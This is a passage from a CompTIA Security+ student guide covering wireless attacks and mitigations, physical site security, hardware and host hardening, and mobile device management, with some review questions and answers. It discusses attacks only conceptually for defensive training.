One solution is to use EAP-TLS security so that the authentication server and clients
perform mutual authentication. There are also various scanners and monitoring
systems that can detect rogue APs, including AirMagnet (https://
www.enterprise.netscout.com/products/airmagnet-survey), inSSIDer (https://
www.metageek.com/products/inssider), Kismet (https://
www.kismetwireless.net), and Xirrus Wi-Fi Inspector (https://www.xirrus.com).
Another option is a wireless intrusion detection system (WIDS) or wireless
intrusion prevention system (WIPS). As well as rogue access points, WIPS can detect
and prevent attacks against WLAN security, such as MAC spoofing and DoS.
DEAUTHENTICATION/DISASSOCIATION ATTACKS
The use of a rogue AP may be coupled with a deauthentication attack. This sends a
stream of spoofed deauth frames to cause a client to deauthenticate from an AP. This
might allow the attacker to interpose the rogue AP or to sniff information about the
authentication process (such as a non-broadcast ESSID).
A similar attack hits the target with disassociation packets, rather than fully
deauthenticating the station. A disassociated station is not completely disconnected,
but neither can it communicate on the network until it reassociates. Both attacks may
also be used to perform a Denial of Service (DoS) attack against the wireless
infrastructure. These attacks work against both WEP and WPA. The attacks can be
mitigated if the wireless infrastructure supports Management Frame Protection (MFP/
802.11w). Both the AP and clients must be configured to support MFP.
JAMMING (INTERFERENCE)
A wireless network can be disrupted by interference from other radio sources. These
are often unintentional, but it is also possible for an attacker to purposefully jam an
access point. This might be done simply to disrupt services or to position an evil twin
AP on the network with the hope of stealing data. A Wi-Fi jamming attack can be
performed by setting up an AP with a stronger signal. Wi-Fi jamming devices are also
widely available, though they are often illegal to use and sometimes to sell. Such
devices can be very small, but the attacker still needs to gain fairly close physical
proximity to the wireless network.
The only ways to defeat a jamming attack are either to locate the offending radio
source and disable it, or to boost the signal from the legitimate equipment. AP's for
home and small business use are not often configurable, but the more advanced
wireless access points, such as Cisco's Aironet series, support configurable power level
controls. The source of interference can be detected using a spectrum analyzer.
Unlike a Wi-Fi analyzer, a spectrum analyzer must use a special radio receiver (Wi-Fi
adapters filter out anything that isn't a Wi-Fi signal). They are usually supplied as
handheld units with a directional antenna, so that the exact location of the
interference can be pinpointed.
• Device discovery—a device can be put into discoverable mode meaning that it will
connect to any other Bluetooth devices nearby. Unfortunately, even a device in non-
discoverable mode is quite easy to detect.
• Authentication and authorization—devices authenticate ("pair") using a simple
passkey configured on both devices. This should always be changed to some secure
phrase and never left as the default. Also, check the device's pairing list regularly to
confirm that the devices listed are valid.
• Malware—there are proof-of-concept Bluetooth worms and application exploits,
most notably the BlueBorne exploit (http://go.armis.com/hubfs/BlueBorne
%20Technical%20White%20Paper.pdf), which can compromise any active and
unpatched system regardless of whether discovery is enabled and without requiring
any user intervention. There are also vulnerabilities in the authentication schemes
of many devices. Keep devices updated with the latest firmware.
Pairing a computer with a smartphone. (Screenshot used with permission from Microsoft.)
Note: It is also the case that using a control center toggle may not actually turn off the
Bluetooth radio on a mobile device. If there is any doubt about patch status or exposure
to vulnerabilities, Bluetooth should be fully disabled through device settings.
Activity 10-2
Discussing Wireless Security Settings
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
3. Why is it best to disable the wireless adapter in a laptop if Wi-Fi is not being
used?
It is a general security best practice to disable any functionality that is not used
or required. The adapter may provide "backdoor" access to the computer if not
configured correctly. Wi-Fi can be set up in ad hoc mode, which means
computers can be configured to connect to one another.
No, an enterprise network will use RADIUS authentication. WPS uses PSK and
there are weaknesses in the protocol.
5. You want to deploy a wireless network where only clients with domain-
issued digital certificates can join the network. What type of authentication
mechanism is suitable?
EAP-TLS is the best choice because it requires that both server and client be
installed with valid certificates.
6. John is given a laptop for official use and is on a business trip. When he
arrives at his hotel, he turns on his laptop and finds a wireless access point
with the name of the hotel, which he connects to for sending official
communications. He may become a victim of which wireless threat?
Evil twin.
Bluesnarfing.
If the device allows NFC transfers to occur without requiring authorization, a tag
could be coded to open a resource (such as a web page with a malicious script)
to exploit software on the device.
Topic C
Explain the Importance of Physical
Security Controls
EXAM OBJECTIVES COVERED
3.9 Explain the importance of physical security controls.
If an attacker can gain physical access to your premises, there may be lots of
opportunities to install rogue devices, vandalize or disrupt systems, or observe
confidential information. You also have to consider the importance of availability and
the impact that manmade or natural disaster could have on your systems.
Consequently, as a security professional, you should be able to explain the importance
of installing appropriate physical security controls.
basic no trespassing signs, some homes and offices also display signs from the
security companies whose services they are currently using. These may convince
intruders to stay away. Conversely, entry points to secure zones should be discreet.
Do not allow an intruder the opportunity to inspect security mechanisms protecting
such zones (or even to know where they are).
• Try to minimize traffic having to pass between zones. The flow of people should be
"in and out" rather than "across and between."
• Make high traffic public areas high visibility, so that covert use of gateways, network
access ports, and computer equipment is hindered, and surveillance is simplified.
• In secure zones, do not position display screens or input devices facing toward
pathways or windows. Alternatively, use one-way glass so that no one can look in
through windows.
FENCING
The exterior of a building may be protected by fencing. Security fencing needs to be
transparent (so that guards can see any attempt to penetrate it), robust (so that it is
difficult to cut), and secure against climbing (which is generally achieved by making it
tall and possibly by using razor wire). Fencing is generally effective, but the drawback is
that it gives a building an intimidating appearance. Buildings that are used by
companies to welcome customers or the public may use more discreet security
methods.
LIGHTING
Security lighting is enormously important in contributing to the perception that a
building is safe and secure at night. Well-designed lighting helps to make people feel
safe, especially in public areas or enclosed spaces, such as parking garages. Security
lighting also acts as a deterrent by making intrusion more difficult and surveillance
(whether by camera or guard) easier. The lighting design needs to account for overall
light levels (illuminance), the lighting of particular surfaces or areas (allowing cameras
to perform facial recognition, for instance), and avoiding areas of shadow and glare.
Generic examples of locks—From left to right, a standard key lock, a deadbolt lock, and an
electronic keypad lock. (Images from user macrovector © 123RF.com.)
• Token-based—a smart lock may be opened using a magnetic swipe card or feature
a proximity reader to detect the presence of a wireless key fob or one-time
password generator (physical tokens) or smart card.
• Biometric—a lock may be integrated with a biometric scanner.
Generic examples of a biometric thumbprint scanner lock and a token-based key card lock.
(Images from user macrovector © 123RF.com.)
• Multifactor—a lock may combine different methods (for example, smart card with
PIN).
Locks using a physical key are only as secure as the key management process used to
protect the keys. The more physical copies of each key that are made, the less secure
the gateway becomes. It is important to track who is holding a key at any one time and
to ensure that a key cannot be removed from the site (to prevent a copy being made).
Locks using smart cards will require the management of the cryptographic keys issued
to the lock mechanism and the smart cards.
Apart from being vulnerable to lock picking, the main problem with a simple door or
gate as an entry mechanism is that it cannot accurately record who has entered or left
an area. Multiple people may pass through the gateway at the same time; a user may
hold a door open for the next person; an unauthorized user may "tailgate" behind an
authorized user. This risk may be mitigated by installing a turnstile (a type of gateway
that only allows one person through at a time). The other option is to add some sort of
surveillance on the gateway. Where security is critical and cost is no object, a mantrap
could be employed. A mantrap is where one gateway leads to an enclosed space
protected by another barrier.
ALARM SYSTEMS
As well as authorized gateways (such as gates and doors), consider the security of
entry points that could be misused, such as emergency exits, windows, hatches, grilles,
and so on. These may be fitted with bars, locks, or alarms to prevent intrusion. Also
consider pathways above and below, such as false ceilings and ducting. There are
three main types of alarm:
• Circuit—a circuit-based alarm sounds when the circuit is opened or closed,
depending on the type of alarm. This could be caused by a door or window opening
or by a fence being cut. A closed-circuit alarm is more secure because an open
circuit alarm can be defeated by cutting the circuit.
• Motion detection—a motion-based alarm is linked to a detector triggered by any
movement within an area (defined by the sensitivity and range of the detector),
such as a room. The sensors in these detectors are either microwave radio
reflection (similar to radar) or Passive Infrared (PIR), which detect moving heat
sources.
• Duress—this type of alarm is triggered manually by staff if they come under threat.
There are many ways of implementing this type of alarm, including wireless
pendants, concealed sensors or triggers, and DECT handsets or smartphones. Some
electronic entry locks can also be programmed with a duress code that is different
from the ordinary access code. This will open the gateway but also alert security
personnel that the lock has been operated under duress.
Circuit-based alarms are typically suited for use at the perimeter and on windows and
doors. These may register when a gateway is opened without using the lock
mechanism properly or when a gateway is held open for longer than a defined period.
Motion detectors are useful for controlling access to spaces that are not normally
used. Duress alarms are useful for exposed staff in public areas. An alarm might simply
sound an alert or it may be linked to a monitoring system. Many alarms are linked
directly to local law enforcement or to third-party security companies. A silent alarm
alerts security personnel rather than sounding an audible alarm.
are longer, and security may be compromised if not enough staff are in place to
monitor the camera feeds.
The cameras in a CCTV network are typically connected to a multiplexer using coaxial
cabling. The multiplexer can then display images from the cameras on one or more
screens, allow the operator to control camera functions, and record the images to tape
or hard drive. Newer camera systems may be linked in an IP network, using regular
data cabling.
Note: If you consider control types, a security guard is a preventive control, as the guard
can both discover and act to prevent an attack. A camera is a detective control only.
Some data centers may contain racks with equipment owned by different companies
(colocation). These racks can be installed inside cages so that technicians can only
physically access the racks housing their own company's servers and appliances.
Colocation cages. (Image © Chris Dag and shared with CC BY 2.0 flickr.com/photos/chrisdag/
865711871.)
Portable devices and media (backup tapes or USB media storing encryption keys, for
instance) may be stored in a safe. Safes can feature key-operated or combination locks
but are more likely to come with electronic locking mechanisms. Safes can be rated to
a particular cash value for the contents against various international grading schemes.
There are also fire safes that give a certain level of protection against exposure to
smoke and flame and to water penetration (from fire extinguishing efforts).
A privacy filter or screen filter prevents anyone but the user from reading the screen
(shoulder surfing). Modern TFTs are designed to be viewed from wide angles. This is
fine for home entertainment use but raises the risk that someone would be able to
observe confidential information shown on a user's monitor. A privacy filter restricts
the viewing angle to the person directly in front of the screen.
A server or equipment room should also provide decent air flow around the server
equipment. Air flow is provided by ensuring enough space (at least three feet or one
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 10: Installing and Configuring Wireless and Physical Access Security | Topic C
The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update | 433
meter) around the server or rack. Obviously, air conditioning vents should not be
blocked by racks or equipment. Where possible, the space should not be exposed to
direct sunlight.
Note: The server room should not be used as storage space. Do not leave boxes or
unused equipment in it. Also, do not install unnecessary devices that generate a lot of
heat and dust, such as printers.
The positive air pressure created by the HVAC system also forces contaminants such as
dust out of the facility. Filters on HVAC systems collect the dust and must be changed
regularly. When using an air conditioning system, ensure that it is inspected and
maintained periodically. Systems may be fitted with alarms to alert staff to problems.
Highly mission-critical systems may require a backup air conditioning system.
Note: Use a portable monitor to verify that the HVAC's temperature and humidity
sensors are returning the correct readings.
Hot aisle containment design—Cold air circulates from the air conditioner under the floor and around
the rack, while hot air is drawn from between the racks through the ceiling space (plenum) to a heat
exchanger. In this design, it is important that hot air does not leak from the ceiling or from the floor
space between the racks. (Image © 123RF.com.)
Make sure that cabling is secured by cable ties or ducting and does not run across
walkways. Cable is best run using a raised floor. If running cable through plenum
spaces, make sure it is fire-retardant and be conscious of minimizing proximity to
electrical sources, such as electrical cable and fluorescent light, which can corrupt data
signals (Electromagnetic Interference [EMI]). You also need to ensure that there is
sufficient space in the plenum for the air conditioning system to work properly—filling
the area with cable is not the best idea.
Note: To reduce interference, data/network cabling should not be run parallel to power
cabling. If EMI is a problem, shielded cabling can be installed. Alternatively, the copper
cabling could be replaced with fiber optic cabling, which is not susceptible to EMI.
Premises may also be fitted with an overhead sprinkler system. Most sprinklers work
automatically, are triggered by heat, and discharge water. These are referred to as
"wet-pipe" systems. Wet-pipe poses a problem for areas containing sensitive
equipment or materials, such as network communications rooms and library or
museum archives. Wet-pipe systems constantly hold water at high pressure, so there is
some risk of burst pipes and accidental triggering, as well as the damage that would be
caused in the event of an actual fire. There are several alternatives to wet-pipe systems
that can minimize damage that may be caused by water flooding the room.
• Dry-pipe—these are used in areas where freezing is possible; water only enters this
part of the system if sprinklers elsewhere are triggered.
• Pre-action—a pre-action system only fills with water when an alarm is triggered; it
will then spray when the heat rises. This gives protection against accidental
discharges and burst pipes and gives some time to contain the fire manually before
the sprinkler operates.
Activity 10-3
Discussing Physical Security Controls
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Lighting is one of the most effective deterrents. Any highly visible security
control (guards, fences, dogs, barricades, CCTV, signage, and so on) will act as a
deterrent.
2. What types of physical security controls would you suggest for the main
server room?
Answers will vary, but should be focused on access controls surrounding the
room such as door locks with identification systems, surveillance systems,
motion detectors, and possibly an alarm system.
6. Where would you expect to find "hot and cold" aisles and what is their
purpose?
This layout is used in a data center or large server room. The layout is the best
way to maintain a stable temperature and reduce loss of availability due to
thermal problems.
7. What physical security device could you use to ensure the safety of onsite
backup tapes?
A fireproof safe.
Summary
In this lesson, you continued to look at the requirements and systems used to
implement a secure network design, focusing on wireless access methods and physical
site security.
• You should know how to configure and troubleshoot a secure wireless network.
• You should be able to distinguish EAP types and select an appropriate EAP
mechanism for a given scenario.
• You should understand the risks posed by different types of wireless attacks.
• You should be able to list and explain the features used to provide site security.
• You should understand the use of environmental controls to provide suitable
conditions for server equipment and protect against fire risks.
A: Answers will vary. Most organizations will need to implement at least WPA2. The
only organizations that should allow any type of open wireless network access
are those that need to allow customers to access, such as coffee shops or other
public Wi-Fi. In such cases, a captive portal should be implemented to test the
health of the device connecting to the network and to gather information from
the user.
A: Answers will vary. Most organizations will have security cameras, locks, and
possibly ID badges. Public locations such as stores and banks will not have the
ability to limit access to the premises, but are likely to have a security guard and
areas that are off limits to customers.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
Effective network architecture design and the use of appliances such as firewalls and intrusion
detection help to provide a secure network environment, but we also need to consider the security
systems configured on network hosts as well. Most network attacks are launched by compromised
or rogue host devices and security procedures are complicated by the range of different types of
hosts that networks must support, from PCs and laptops to smartphones and embedded
controllers.
LESSON OBJECTIVES
In this lesson, you will:
• Implement secure hardware systems design.
• Implement secure host systems design.
• Implement secure mobile device systems design.
• Implement secure embedded systems design.
Topic A
Implement Secure Hardware Systems
Design
EXAM OBJECTIVES COVERED
3.3 Given a scenario, implement secure systems design.
The security of the hardware underpinning our network and computing devices is
often overlooked. In part, this is because it is difficult for most companies to make
their own investigations in this area. They have to rely on the market and security
agencies to identify bad actors in supply chains. Nevertheless, it is important that you
understand the issues involved in secure systems design so that you can evaluate
product offerings and make recommendations for purchasing and device
configuration.
HARDWARE/FIRMWARE SECURITY
A hardware Root of Trust (RoT) or trust anchor is a secure subsystem that is able to
provide attestation (declare something to be true). For example, when a computer
joins a network, it might submit a report to the Network Access Control (NAC) server
declaring, "My operating system files have not been replaced with malicious versions."
The hardware root of trust is used to scan the boot metrics and OS files to verify their
signatures, then it signs the report and allows the NAC server to trust it. The NAC
server compares the report to its stored template of the same metrics and file
signatures and decides whether to grant access or not.
The problem with establishing a hardware root of trust is that devices are used in
environments where anyone can get complete control over them. There cannot be
complete assurance that the firmware underpinning the hardware root of trust is
inviolable, but attacks against trusted modules are sufficiently difficult so as to provide
effective security in most cases.
Configuring a Trusted Platform Module using system setup on an HP workstation. (Screenshot used
with permission from HP.)
The TPM also supports the concept of an owner, usually identified by a password
(though this is not mandatory). Anyone with administrative control over the setup
program can take ownership of the TPM, which destroys and then regenerates its
subkeys. A TPM can be managed in Windows via the tpm.msc console or through
group policy.
Note: You can think of a TPM as a sort of small and specialized Hardware Security
Module (HSM). An HSM is a more powerful external device used to manage numerous
keys in PKI.
SUPPLY CHAIN
A supply chain is the end-to-end process of supplying, manufacturing, distributing,
and finally releasing goods and services to a customer. For the TPM to be trustworthy,
the supply chain of chip manufacturers, firmware authors, OEM resellers, and
administrative staff responsible for provisioning the computing device to the end user
must all be trustworthy. Anyone with the time and resources to modify the computer's
firmware could (in theory) create some sort of backdoor access. It is also critical that no
one learn the endorsement key programmed into each TPM. Anyone obtaining the
endorsement key will be able to impersonate that TPM.
Note: Christopher Tarnovksy was successful in obtaining the key from one version of a
TPM chip, but the process used to do so involved considerable complexity (https://
www.blackhat.com/presentations/bh-dc-08/Tarnovsky/Presentation/bh-dc-08-
tarnovsky.pdf).
Establishing a trusted supply chain for computer equipment essentially means denying
malicious actors the time or resources to modify the assets being supplied.
Note: For most businesses, use of reputable OEMs will represent the best practical effort
at securing the supply chain. Military organizations will exercise greater scrutiny. Great
care should be taken if use is made of second-hand machines.
Configuring secure boot settings via an HP workstation's UEFI firmware setup program. (Screenshot
used with permission from HP.)
Full Disk Encryption (FDE) means that the entire contents of the drive (or volume),
including system files and folders, are encrypted. OS ACL-based security measures are
quite simple to circumvent if an adversary can attach the drive to a different host OS.
Drive encryption allays this security concern by making the contents of the drive
accessible only in combination with the correct encryption key.
FDE requires the secure storage of the key used to encrypt the drive contents.
Normally, this is stored in a TPM. The TPM chip has a secure storage area that a disk
encryption program, such as Windows BitLocker®, can write its keys to. It is also
possible to use a removable USB drive (if USB is a boot device option). As part of the
setup process, you create a recovery password or key. This can be used if the disk is
moved to another computer or the TPM is damaged.
Activating BitLocker drive encryption. (Screenshot used with permission from Microsoft.)
One of the drawbacks of FDE is that, because the OS performs the cryptographic
operations, performance takes a hit. This issue is mitigated by Self-Encrypting Drives
(SED), where the cryptographic operations are performed by the drive controller. The
SED uses a Media Encryption Key (MEK) to encrypt data and stores the MEK securely by
encrypting it with a Key Encryption Key (KEK), generated from the user password.
Like most peripherals, displays have no protection against malicious firmware updates.
Researchers (https://motherboard.vice.com/en_us/article/jpgdzb/hackers-could-
break-into-your-monitor-to-spy-on-you-and-manipulate-your-pixels) have
demonstrated an exploit against a reverse-engineered Dell monitor. Once the
malicious firmware is loaded, the display can be manipulated by sending it instructions
coded into pixel values in a specially crafted web page.
PRINTERS/MFDS
One of the most famous printer exploits was to rewrite the firmware of a Canon inkjet
to install the computer game Doom on it (https://contextis.com/en/blog/hacking-
canon-pixma-printers-doomed-encryption). Printers or more generally Multifunction
Devices (MFD), with fax and scan capabilities, represent a powerful pivot point on an
enterprise network:
• Interfaces and code are not always kept as secure as OS code, making them
potentially more vulnerable to compromise.
• An adversary can snoop on and copy highly confidential data in cleartext.
• The hard disk is a useful means of staging data for exfiltration.
• Network connectivity might bridge user and administrative network segments and
allow wider network penetration.
Activity 11-1
Discussing Secure Hardware Systems
Design
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Trusted OS means that the OS fully mediates the access control system. If this is
not the case, an attacker may be able to bypass the security controls.
4. Why are OS-enforced file access controls not sufficient in the event of the
loss or theft of a computer or mobile device?
The disk (or other storage) could be attached to a foreign system and the
administrator could take ownership of the files. File-level or Full Disk Encryption
(FDE) mitigates this by requiring the presence of the user's decryption key to
read the data.
Only use reputable suppliers for peripheral devices and strictly controlled
sources for firmware updates. Consider use of a sheep dip sandboxed system
to observe a device before allowing it to be attached to a host in the enterprise
network. Use execution control software to whitelist only approved USB
vendors.
6. Aside from leaving sensitive documents uncollected in the output tray, are
there security concerns with respect to printers?
Modern printers have their own hard drive, OS, and firmware and are,
therefore, susceptible to the same attacks like any other computer—with the
additional problem that many users are unaware of this and, therefore, do not
remember to update or patch operating systems to securely delete the
contents of the drive, or destroy the drive itself upon retiring the printer.
Topic B
Implement Secure Host Systems Design
EXAM OBJECTIVES COVERED
1.6 Explain the impact associated with types of vulnerabilities.
2.3 Given a scenario, troubleshoot common security issues.
2.4 Given a scenario, analyze and interpret output from security technologies.
3.3 Given a scenario, implement secure systems design.
Host hardware integrity is not of much use if the OS and applications software running
on it is weakly configured. As a security professional, you will often assist with drafting
configuration baselines, ensuring hosts comply with those baselines, and
troubleshooting any issues that arise.
SECURE CONFIGURATIONS
The process of putting an operating system or application in a secure configuration is
called hardening. Typically, hardening is implemented to conform with the security
requirements in a defined security policy. Many different hardening techniques can be
employed, depending on the type of system and the desired level of security. When
hardening a system, it is important to keep in mind its intended use, because
hardening a system can also restrict the system's access and capabilities. The need for
hardening must be balanced against the access requirements and usability in a
particular situation. For an OS functioning in any given role, there will usually be a fairly
standard series of steps to follow to apply a secure configuration to allow the OS and
applications software to execute that role. This can also be described as host software
baselining. The essential principle is of least functionality; that a system should run
only the protocols and services required by legitimate users and no more. This reduces
the potential attack surface.
• Interfaces provide a connection to the network. Some machines may have more
than one interface. For example, there may be wired and wireless interfaces or a
modem interface. Some machines may come with a management network interface
card. If any of these interfaces are not required, they should be explicitly disabled
rather than simply left unused.
• Services provide a library of functions for different types of applications. Some
services support local features of the OS and installed applications. Other services
support remote connections from clients to server applications. Unused services
should be disabled.
• Application service ports allow client software to connect to applications. Again,
these should be closed if remote access is not required. Also consider that an
application may use multiple ports. For example, there may be a standard user port
and another port for management functions. Finally, be aware that a server might
be configured with a non-standard port. For example, an HTTP server might be
configured to use 8080 rather than 80.
It is also important to establish a maintenance cycle for each device and keep up to
date with new security threats and responses for the particular software products that
you are running.
Note: Mobile devices require many of the same hardening steps that workstations do,
with a few additional considerations that are specific to mobile security. As mobile
devices are generally configured with access to email accounts, personal photographs,
text messages, and the like, the loss of an inappropriately secured mobile device can be a
very risky proposition.
KIOSKS
A kiosk is a computer terminal deployed to a public environment. Kiosks have a wide
range of uses, such as providing ATM services or airport check-in, as well as
informational kiosks used in shopping centers, art galleries, and museums. A kiosk
needs to be fully locked down so that users are only able to access the menus and
commands needed to operate the kiosk application.
Some kiosks will run dedicated operating systems. Specialist kiosk software to
implement secure functionality on a publicly-accessible device is available for
operating systems such as Windows, Android®, or iOS®. Hardware ports must be made
completely inaccessible. If the kiosk supports keyboard input, this must be filtered to
prevent the use of control keys to launch additional windows or utilities.
Using Security Compliance Manager to compare settings in a production GPO with Microsoft's
template policy settings. (Screenshot used with permission from Microsoft.)
Exploit protection settings in Windows 10. (Screenshot used with permission from Microsoft.)
PATCH MANAGEMENT
Each type of operating system has unique vulnerabilities that present opportunities for
would-be attackers. Systems from different vendors have different weaknesses, as do
systems with different purposes. As soon as a vulnerability is identified, vendors will try
to correct it. At the same time, attackers will try to exploit it. There can never be a
single comprehensive list of vulnerabilities for each operating system, so you must stay
up to date with the system security information posted on vendor websites and in
other security references. Software updates resolve issues that a vendor has identified
in the initial release of their product, based on additional testing or customer feedback.
The updates are usually provided free-of-charge.
It makes sense to trial an update, especially a service release, on a test system to try to
discover whether it will cause any problems. Approach the update like a software
installation or upgrade (make a backup and a rollback plan). Read the documentation
accompanying the update carefully. Updates may need to be applied in a particular
order, and there may be known compatibility issues or problems listed in the ReadMe.
Most operating systems and applications now support automatic updates via a vendor
website.
Management interface for WSUS. (Screenshot used with permission from Microsoft.)
If an update fails to install, it will report an error code. You can use this code to
troubleshoot the issue. Windows Update actions are also written to a log (%windir%
\Windowsupdate.log).
Configuring package manager sources in CentOS using the yum utility. Note that a GPG key is used to
verify package integrity. (Screenshot used with permission from CentOS.)
The integrity of a package can be tested by making an MD5 hash of the compiled
package. The MD5 value is published on the package vendor's site. When you
download a package, you can run md5sum on the package file and compare the
output with the published value. If they do not match, you should not proceed with the
installation. Package managers may also use GPG signatures to validate updates. The
public key used to verify the package is stored on the machine.
provisioning a supplier for applications and devices, it is vital to establish that they
have effective security management lifecycles for their products.
Note: To learn more, watch the related Video on the course website.
Activity 11-2
Discussing Secure Host Systems Design
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
A basic principle of security is to run only services that are needed. Many
default OS installations and network devices also install optional services
automatically, requiring the installer to disable them if they are not needed.
Most devices and software now ship in a security-enabled configuration,
meaning that the installer must choose which services to install and enable.
2. Why is it essential to follow a baseline when setting up a system for the first
time?
Unless you know where you started, you won't know how far you've come.
Security monitoring and accounting largely depends on identifying things that
are out-of-the-ordinary. Baselining a system establishes what is normal.
6. What first step must you take when configuring automatic updates on a
Linux server?
7. Why are end-of-life systems and lack of vendor support distinct from one
another as vulnerability management challenges?
Topic C
Implement Secure Mobile Device
Systems Design
EXAM OBJECTIVES COVERED
2.5 Given a scenario, deploy mobile devices securely.
Today, mobile devices are used everywhere and are deployed by many companies for
employees' business use. These devices have unique security concerns that you'll need
to address.
Note: You will refer primarily to MDM but be aware that some solutions are branded as
Mobile Application Management (MAM) or Mobile Content Management (MCM) because
they focus on managing a part of the device, not all of it. These different types of
management software are also described collectively as Enterprise Mobility Management
(EMM).
The core functionality of these suites is rather similar to Network Access Control
(NAC) solutions. The management software logs the use of a device on the network
and determines whether to allow it to connect or not, based on administrator-set
parameters. When the device is enrolled with the management software, it can be
configured with policies to allow or restrict use of apps, corporate data, and built-in
functions, such as a video camera or microphone.
A key feature is the ability to support multiple operating systems, such as iOS®,
Android™, BlackBerry®, and the various iterations of Windows® and Windows Mobile®.
A few MDM suites are OS-specific, but the major ones, such as AirWatch® (http://air-
watch.com), Microsoft Intune® (https://www.microsoft.com/en-us/enterprise-
mobility-security/microsoft-intune), Symantec™ (https://www.symantec.com/
products/endpoint-protection-mobile), and XenMobile (https://www.citrix.com/
products/citrix-endpoint-management), support multiple device vendors.
Configuring iOS device enrollment in Microsoft's Intune EMM suite. (Screenshot used with permission
from Microsoft.)
Most iOS attacks are the same as with any system; users click malicious links or enter
information into phishing sites, for instance. As a closed and proprietary system, it
should not be possible for malware to infect an iOS device as all code is updated from
Apple's servers only. There remains the risk that a vulnerability in either iOS or an app
could be discovered and exploited. In this event, users would need to update iOS or
the app to a version that mitigates the exploit.
iOS devices are normally updated very quickly. With Android, the situation is far more
patchy, as updates often depend on the handset vendor to complete the new version
or issue the patch for their flavor of Android. Android OS is more open and there is
Android malware, though as with Apple, it is difficult for would-be hackers and
spammers to get it into any of the major app repositories.
Note: One technique used is called Staged Payloads. The malware writers release an app
that appears innocuous in the store but once installed it attempts to download
additional components infected with malware (for more information, visit https://
www.symantec.com/connect/blogs/android-threat-trend-shows-criminals-are-
thinking-outside-box). At the time of writing, Google is rolling out a server-side malware
scanning product (Play Protect) that will both warn users if an app is potentially
damaging and scan apps that have already been purchased, and warn the user if any
security issues have been discovered.
Like iOS, Android apps operate within a sandbox. When the app is installed, access is
granted (or not) to specific shared features, such as contact details, SMS texting, and
email. As well as being programmed with the code for known malware, A-V software
for Android can help the user determine whether an app install is seeking more
permissions than it should. However, because the A-V software is also sandboxed, it is
often not very effective. Mobile A-V software can also have a substantial impact on
performance and battery life.
Locking down Android connectivity methods with Intune—Note that most settings can be applied only
to Samsung KNOX-capable devices. (Screenshot used with permission from Microsoft.)
Smartphones and some tablets use the cell phone network for calls and data access.
There have been attacks and successful exploits against the major infrastructure and
protocols underpinning the telecoms network, notably the SS7 hack (https://
www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw). There is little that
either companies or individuals can do about these weaknesses. The attacks require a
high degree of sophistication and are relatively uncommon.
Mobile devices usually default to using a Wi-Fi connection for data, if present. If the
user establishes a connection to a corporate network using strong WPA2 security,
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 11: Deploying Secure Host, Mobile, and Embedded Systems | Topic C
The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update | 465
there is a fairly low risk of eavesdropping or Man-in-the-Middle attacks. The risks from
Wi-Fi come from users connecting to open access points or possibly a rogue access
point imitating a corporate network. These allow the access point owner to launch any
number of attacks, even potentially compromising sessions with secure servers (using
an SSL stripping attack, for instance).
websites. In addition to this, access to contacts and message history (SMS, email, and
IM) greatly assists social engineering attacks.
The majority of smartphones and tablets are single-user devices. Access control can be
implemented by configuring a screen lock that can only be bypassed using the correct
password, PIN, or swipe pattern. Many devices now support biometric
authentication, usually as a fingerprint reader but sometimes using facial or voice
recognition.
Configuring authentication and profile policies using Intune EMM—Note that the policy allows the user
to have a different type of authentication (or none at all) to the workspace hosting corporate apps and
data. (Screenshot used with permission from Microsoft.)
Note: Strong passwords should always be set on mobile devices, as simple 4-digit PIN
codes can easily be brute-forced. Swipe patterns are vulnerable to poor user choices
(https://arstechnica.com/information-technology/2015/08/new-data-uncovers-the-
surprising-predictability-of-android-lock-patterns/), such as choosing letter or box
patterns.
The screen lock can also be configured with a lockout policy. This means that if an
incorrect passcode is entered, the device locks for a set period. This could be
configured to escalate (so the first incorrect attempt locks the device for 30 seconds
while the third locks it for 10 minutes, for instance). This deters attempts to guess the
passcode.
It is also important to consider newer authentication models, such as context-aware
authentication. For example, smartphones now allow users to disable screen locks
when the device detects that it is in a trusted location, such as the home. Conversely,
an enterprise may seek more stringent access controls to prevent misuse of a device.
REMOTE WIPE
Another possibility is for the phone to support a remote wipe or kill switch. This
means that if the handset is stolen it can be set to the factory defaults or cleared of any
personal data (sanitization). Some utilities may also be able to wipe any plug-in
memory cards too. The remote wipe could be triggered by several incorrect passcode
attempts or by enterprise management software. Other features include backing up
data from the phone to a server first and displaying a "Lost/stolen phone—return to
XX" message on the handset.
Most corporate messaging systems come with a remote wipe feature (such as this one provided with
Intermedia mail hosting), allowing mail, calendar, and contacts information to be deleted from mobile
devices. (Screenshot used with permission from Intermedia.)
In theory, a thief can prevent a remote wipe by ensuring the phone cannot connect to
the network, then hacking the phone and disabling the security.
A mobile device contains a solid state (flash memory) drive for persistent storage of
apps and data. Typical capacities range from 8 to 256 GB. This storage is not
upgradeable. Some Android and Windows devices support removable storage using
external media, such as a plug-in Micro SecureDigital (SD) card slot; some may
support the connection of USB-based storage devices. The mobile OS encryption
software might allow encryption of the removable storage too, but this is not always
the case. Care should be taken to apply encryption to storage cards using third-party
software if necessary and to limit sensitive data being stored on them.
iOS-based devices cannot use removable storage, though there are adapters for
importing media via an SD card reader or camera connection kit.
Using Find My Device to locate an Android smartphone. (Android is a trademark of Google LLC.)
Knowing the device's position also allows app vendors and websites to offer location-
specific services (relating to search or local weather, for instance) and (inevitably)
advertising. You can use Location Services settings to determine how visible your
phone is to these services.
The primary concern surrounding location services is one of privacy. Although very
useful when used with navigation systems, it provides a mechanism to track an
individual's movements, and therefore their social habits. The problem is further
compounded by the plethora of mobile apps that require access to location services
and then both send the information to the application developers and store it within
the device's file structure. If an attacker can gain access to this data, then stalking,
social engineering, and even identity theft become real possibilities.
APPLICATION MANAGEMENT
It is critical that the organization's mobile device security practices be specified via
policies, procedures, and training. Although we always want our practices specified via
policies and procedures, it is particularly important with respect to mobile devices
